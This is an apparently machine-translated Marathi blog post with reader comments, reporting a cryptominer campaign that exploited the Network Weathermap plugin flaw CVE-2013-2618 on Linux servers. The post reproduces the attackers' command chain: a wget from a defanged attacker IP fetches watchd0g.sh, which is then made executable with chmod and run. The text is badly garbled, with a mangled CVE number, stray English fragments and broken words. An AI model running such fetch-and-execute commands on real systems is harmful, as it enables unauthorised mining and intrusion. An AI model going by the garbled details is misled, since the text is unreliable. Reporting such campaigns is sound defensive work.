या कडून क्रिप्टोकरन्सी खाण कामगार दूरस्थ संगणकांच्या वापरासह अधिकृतता न या मालकांचा एक ट्रेंड होत आहे. या प्रकारची परिस्थितीबद्दल मी ब्लॉगवर येथे यापूर्वी काही प्रसंगी याबद्दल आधीच बोललो होतो.
आणि हे असे आहे की क्रिप्टोकरन्सीजच्या क्षणापासून हे पूर्णपणे नियंत्रणाबाहेर गेले आहे ब quite्यापैकी स्थान आणि मूल्य घेतले आहेत्यांच्या सुरक्षिततेचे उल्लंघन करणार्या संगणकांवर प्रवेश करण्यासाठी पुरेसे ज्ञान असणार्या लोकांनी आर्थिक फायदा मिळविण्यासाठी महत्वाची माहिती किंवा बँक खात्यांचा शोध घेण्यासाठी वेळ वाया घालवला आहे.
हे करण्याऐवजी ते या संघांवर नियंत्रण ठेवणे आणि त्यांना खाण नेटवर्कमध्ये एकत्रित करण्यामध्ये आणि बॉटनेटद्वारे सामान्यत: करत असलेल्या इतर कार्यांसाठी देखील सर्वात सोप्या गोष्टीची निवड करतात.
अशाप्रकारे आपल्याला सामान्यतः आराम करणे अधिक असते, ते केवळ यामुळे तयार केलेल्या त्वरित पैशावर लक्ष केंद्रित करीत आहेत.
बाजाराच्या ट्रेंडविषयी स्मार्ट आकलन आणि क्रिप्टो ट्रेडिंगचे योग्य ज्ञान असल्यास, चांगले फायदे मिळू शकतात.
लिनक्स खरोखर एक सुरक्षित प्रणाली आहे?
आपल्यापैकी बर्याच जणांची कल्पना आहे की लिनक्स ही जवळजवळ एक परिपूर्ण सुरक्षित ऑपरेटिंग सिस्टम आहे, वास्तविकता अशी आहे की त्यात अजूनही काही त्रुटी आहेत.
छान आहेकाही दिवस ट्रेंडमिक्रोने शोध घेतला, ज्यात प्रकट एक नवीन लिनक्स सिस्टममधील त्रुटी ज्यामुळे हॅकर्सना खाण क्रिप्टोकरन्सीचा फायदा झाला लिनक्स सर्व्हर आणि मशीन्स वापरणे.
आपल्या ब्लॉगद्वारे दिलेल्या निवेदनात त्यांनी खाली टिप्पणी दिली:
घटनेच्या प्रतिसादाशी संबंधित आमच्या निरीक्षणाद्वारे आम्ही घुसखोरीचे प्रयत्न पाहिले ज्यांचे संकेतक जेनकिन्समिनर मालवेयर वापरणार्या मागील क्रिप्टोकरन्सी खाण मोहिमेशी संबंधित होते.
फरक: ही मोहीम लिनक्स सर्व्हरला लक्ष्य करीत आहे. ज्यांचा पॅच जवळजवळ पाच वर्षांपासून उपलब्ध आहे त्या कालबाह्य सुरक्षा त्रुटीचा गैरवापर करून, पुन्हा वापरल्या जाणार्या असुरक्षिततेचा हा एक उत्कृष्ट नमुना आहे.
आपल्या विश्लेषणाद्वारे या प्रकाशनात प्रभावित साइट ओळखण्यात व्यवस्थापित या अपयशासाठी याचा मुख्यतः जपान, तैवान, चीन, अमेरिका आणि भारतवर परिणाम होतो.
हल्ला विश्लेषण
विश्लेषणाद्वारे ट्रेंड मायक्रो स्मार्ट प्रोटेक्शन नेटवर्क द्वारे हल्लेखोर या त्रुटीचा कसा फायदा घेतात यावर तपशीलवार:
या मोहिमेचे संचालक सीव्हीई-२०१-2013-२2618१ explo चा वापर करीत होते, कामापी नेटवर्क वेदरमॅप प्लगइनमधील तारखेची असुरक्षा, सिस्टम प्रशासक नेटवर्क क्रियाकलाप दृश्यमान करण्यासाठी वापरतात.
जुन्या सुरक्षिततेच्या दोषांचे ते का शोषण करीत आहेतः नेटवर्क वेदरमेपकडे जून २०१ from पासून आतापर्यंत केवळ दोन सार्वजनिकरित्या नोंदवलेली असुरक्षा आहे.
हे हल्लेखोर केवळ सुरक्षा त्रुटीचा फायदा घेत असतील ज्यासाठी एक शोषण उपलब्ध आहे परंतु ओपन सोर्स टूल वापरुन संस्थांमध्ये होणा the्या पॅच विलंबाचा देखील फायदा होऊ शकेल.
मुळात हल्ला एक्सएसएस हल्लामार्गे आहे:
अस्पष्ट भाग म्हणजे आक्रमण लक्ष्य, एक पोर्टसह एक वेब सर्व्हर.
फाइल /plugins/weathermap/configs/conn.php सततच्या XSS हल्ल्यामुळे उद्भवणारी फाइल आहे / प्लगइन्स / वेदरमॅप / पीएचपी .
याच्या व्यतिरीक्त conn.php सुरुवातीस, आम्हाला 'नावाच्या पृष्ठावर लागू केलेली समान HTTP विनंती दिसते. cools.php '.
क्रिप्टोकरन्सी खनन प्रोग्राम असुरक्षा द्वारे वितरीत केले जाते लिनक्स सर्व्हर असलेल्या लक्ष्यांवर पीएचपी हवामान नकाशावरुन
प्रतिमेमध्ये आपण हल्ला कसा निर्माण होतो ते पाहू शकता आणि त्याचे वर्णन खालीलप्रमाणे आहे:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
हे असे करते की विजेटसह फाइल डाउनलोड करण्यासाठी संकेत पाठविणे ही एक युटिलिटी आहे जी जवळजवळ सर्व लिनक्स वितरणने पूर्वनिर्धारितपणे स्थापित केली आहे
chmod 775 watchd0g.sh
फाईल कार्यान्वित करण्यायोग्य बनवते
./watchd0g.sh
सर्व्हरवर चालण्यासाठी फाईल मिळवणे हे शेवटी काय करते.
सुदैवाने, आधीच एक पॅच आहे ( सीव्हीई- 2013-2618 ) अपयशासाठी उपलब्ध आणि आपण ते डाउनलोड करू शकता पासून हा दुवा.
Si आपण त्याबद्दल अधिक जाणून घेऊ इच्छित आहात या अपयशाची आपण या दुव्यास भेट देऊ शकता.
स्त्रोत: क्रिप्टोकर्न्सी मायनर पीएचपी वेदरमॅप व्हेनेरेबिलिटीद्वारे वितरीत केले, लिनक्स सर्व्हरला लक्ष्य केले
मूर्ख बनणे सुरक्षित नाही आणि तरीही लिनक्सने तुमची बचत केली.
सुरक्षा पॅचेस अद्यतनित न करणे ही लिनक्सची चूक नाही. काही कंपन्या, पैशाची बचत करण्यासाठी, सिस्टम प्रशासक म्हणून मुर्ख लोकांना भाड्याने देतात, हा दोष आहे.
परंतु तरीही, हे त्वरित ओळखले जाते आणि त्वरित निराकरण केले जाते, यासारख्या कोणत्याही किरकोळ सुरक्षेची घटना देखील प्रकाशित केली जाते.
आणि लिनक्समध्ये आपली अद्यतने लागू केली गेली नाहीत यात काय दोष आहे? जीएनयू / लिनक्स विकसक उदयोन्मुख असुरक्षांवर उपाय शोधून ते त्यांना वापरकर्त्यांसाठी उपलब्ध करुन देऊन त्यांचे कार्य करतात. जर डॉक्टरांनी फ्लूची लस लिहून दिली आणि ती आपल्याला मिळाली नाही तर आपण आजारी आणि ताठर आहात… डॉक्टरांचा दोष काय?
DesdeLinux ते काय होते ते नाही, दोन महत्त्वाच्या त्रुटी असलेल्या सलग दोन बातम्या:
1.- विकसित करण्यासाठी उत्तम संपादकांमध्ये त्यांनी विनामूल्य सॉफ्टवेअर नसलेले असे एक ठेवले आणि ते इतरांना विसरतात (त्यांना टिप्पण्यांमध्ये उद्धृत केले जाते).
२- व्हायरस विषयी महत्त्वाची बातमी जेव्हा ते केवळ नॉन अपडेटेड सर्व्हरवर परिणाम करतात. परंतु जर कोणतेही लिनक्स अनेक दशकांकरिता डीफॉल्टनुसार अद्यतनित केले गेले असेल. घाबरून जाण्यासाठी जसे की आपल्याला विंडोज-शैलीतील शोषक अँटीव्हायरसची आवश्यकता आहे. ते असे म्हणण्याचा प्रयत्न करतात की लिनक्स विंडोजसारखेच आहे आणि नाही.
जर एखादा दोष जुना असेल आणि त्याने आधीच पॅच केले असेल तर ती बातमी नाही किंवा काहीही नाही. ट्रेंड मायक्रो, नॉर्टन, पांडा किंवा मॅकॅफी सारख्या मायक्रोसॉफ्ट आणि अँटीव्हायरस कंपन्या खेळू नका किंवा पैसे द्या.
तसे, आम्ही कित्येक वर्षांपासून कंपनीमध्ये ट्रेंड मायक्रो वापरत होतो आणि हा खरा बटाटा होता, एक कचरा त्याने ते काढून टाकले (ते त्यास एका निर्देशिकेत घेऊन गेले जेणेकरून ते चालणार नाही) त्याचा वापर होऊ देत नाही आणि आम्हाला वापरण्यासाठी आवश्यक असणारी सुरक्षित एक्झिक्युटेबल फायलीसह हे वर्तन रद्द करण्यासाठी कोणतीही श्वेत सूची नाही. शिट जा. ही कॉर्पोरेट आवृत्ती होती, वैयक्तिक आवृत्तीमध्ये श्वेतसूचीची शक्यता असते. दयनीय.
स्वत: चे वर्णन इतके सुरेखपणे करु नका.
लेखात एका सिक्युरिटी होलबद्दल चर्चा केली आहे जी आपल्याला प्रोग्राममध्ये प्रवेश करण्यास परवानगी देते, कार्यान्वित करण्यायोग्य बनवते आणि ती चालवते, हा प्रत्येक विषाणूचा प्रसार होण्याची आवश्यकता असलेला सुरक्षा भोक आहे, अर्थातच हा प्रोग्राम व्हायरस होण्याची गरज आहे ज्याच्या कोडमध्ये त्याची शक्यता आहे. ऑपरेशनची पुनरावृत्ती करण्यासाठी आणि स्व-प्रतिलिपीसाठी नेटवर्कवर संगणक स्कॅन करा. ते नक्कीच तसे करत नाहीत कारण लिनक्समध्ये सापडलेल्या सुरक्षा छिद्रे सुरक्षा पॅचद्वारे संरक्षित केल्या आहेत आणि विंडोज आणि लिनक्समधील फरक म्हणजे माझे अँटीव्हायरस आवश्यक नसले तरी ते छिद्र लपविण्यासाठी आवश्यक आहे. विंडोजमध्ये बर्याच कारणांमुळे हे अधिक कठीण आहे: 1.- प्रभावित संगणकात त्यांच्या परिचयातील एक पायरी काढून फायली फक्त त्यांच्या विस्ताराने एक्झिक्युटेबल होऊ शकतात. २. वापरकर्ते सतत संशयास्पद उत्पत्तीचे प्रोग्राम स्थापित करीत आहेत कारण ते मालकीचे आहेत आणि पैसे न देता त्यांच्याकडे असणे आवश्यक आहे (एमएस ऑफिस, फोटोशॉप, ... संगणक उपकरणाची किंमत दुप्पट करण्यापेक्षा घरगुती अर्थव्यवस्थेसाठी काय असेल हे मी काहीही बोलत नाही). -. लवकरच किंवा नंतर विंडोज चकचकीत होईल, वापरकर्ता तो शेजारी, मित्राकडे घेऊन जाईल ... जो वेळेत सर्वकाही वाया घालवू नये आणि अंतिम विंडोज स्थापित करणार्या अॅक्टिवेशन पॅचसह स्थापित करतो जो पॅच स्वतःच ठेवतो. गुप्तचर कार्यक्रम. हे असे असू शकते की ते नाही आणि ते उत्कृष्ट आहे, परंतु हे कदाचित असे आहे आणि संकेतशब्दावर विंडोज हेरगिरी करू शकेल. लेखात ते असुरक्षामुळे प्रभावित झालेल्या लिनक्समध्ये परिचय प्रणालीचा उल्लेख करतात, प्रोग्राम बनविते जे आपोआप नेटवर्क स्कॅन करते आणि त्याचा वापर स्वतःच कॉपी करण्यासाठी करतो आणि सर्व्हरवर चालतो हे सर्वांचा सर्वात सोपा भाग आहे, म्हणूनच जे सांगितले गेले आहे लेखातील कोणत्याही व्हायरससाठी सर्वात महत्वाची पायरी आहे: सिस्टमला आक्रमण करण्याच्या असुरक्षा जाणून घेणे.
चुकीची माहिती. हे लिनक्समध्ये बग नाही, ते पीएचपी अॅप्लिकेशनमधील एक दोष आहे, म्हणजे ते क्रॉस-प्लॅटफॉर्म आहे. हे लिनक्स कर्नल चालवणा systems्या प्रणालींसाठीदेखील अनन्य नाही! परंतु जरी अनुप्रयोग क्रॉस-प्लॅटफॉर्म नसला तरीही तो लिनक्स बग नसेल तर ते फक्त एक अनुप्रयोग असेल.
लिनक्स कर्नलला क्रॉस-साइट स्क्रिप्टिंग हल्ल्यांपासून संरक्षण करण्यासाठी थोडासा हस्तक्षेप नाही. कमीतकमी पोस्ट करण्यापूर्वी पाच मिनिटांची चौकशी करा कारण खरं की ज्याला ज्यांना कशाबद्दल थोडेसे माहिती आहे ते आपणास वाईट दिसतील.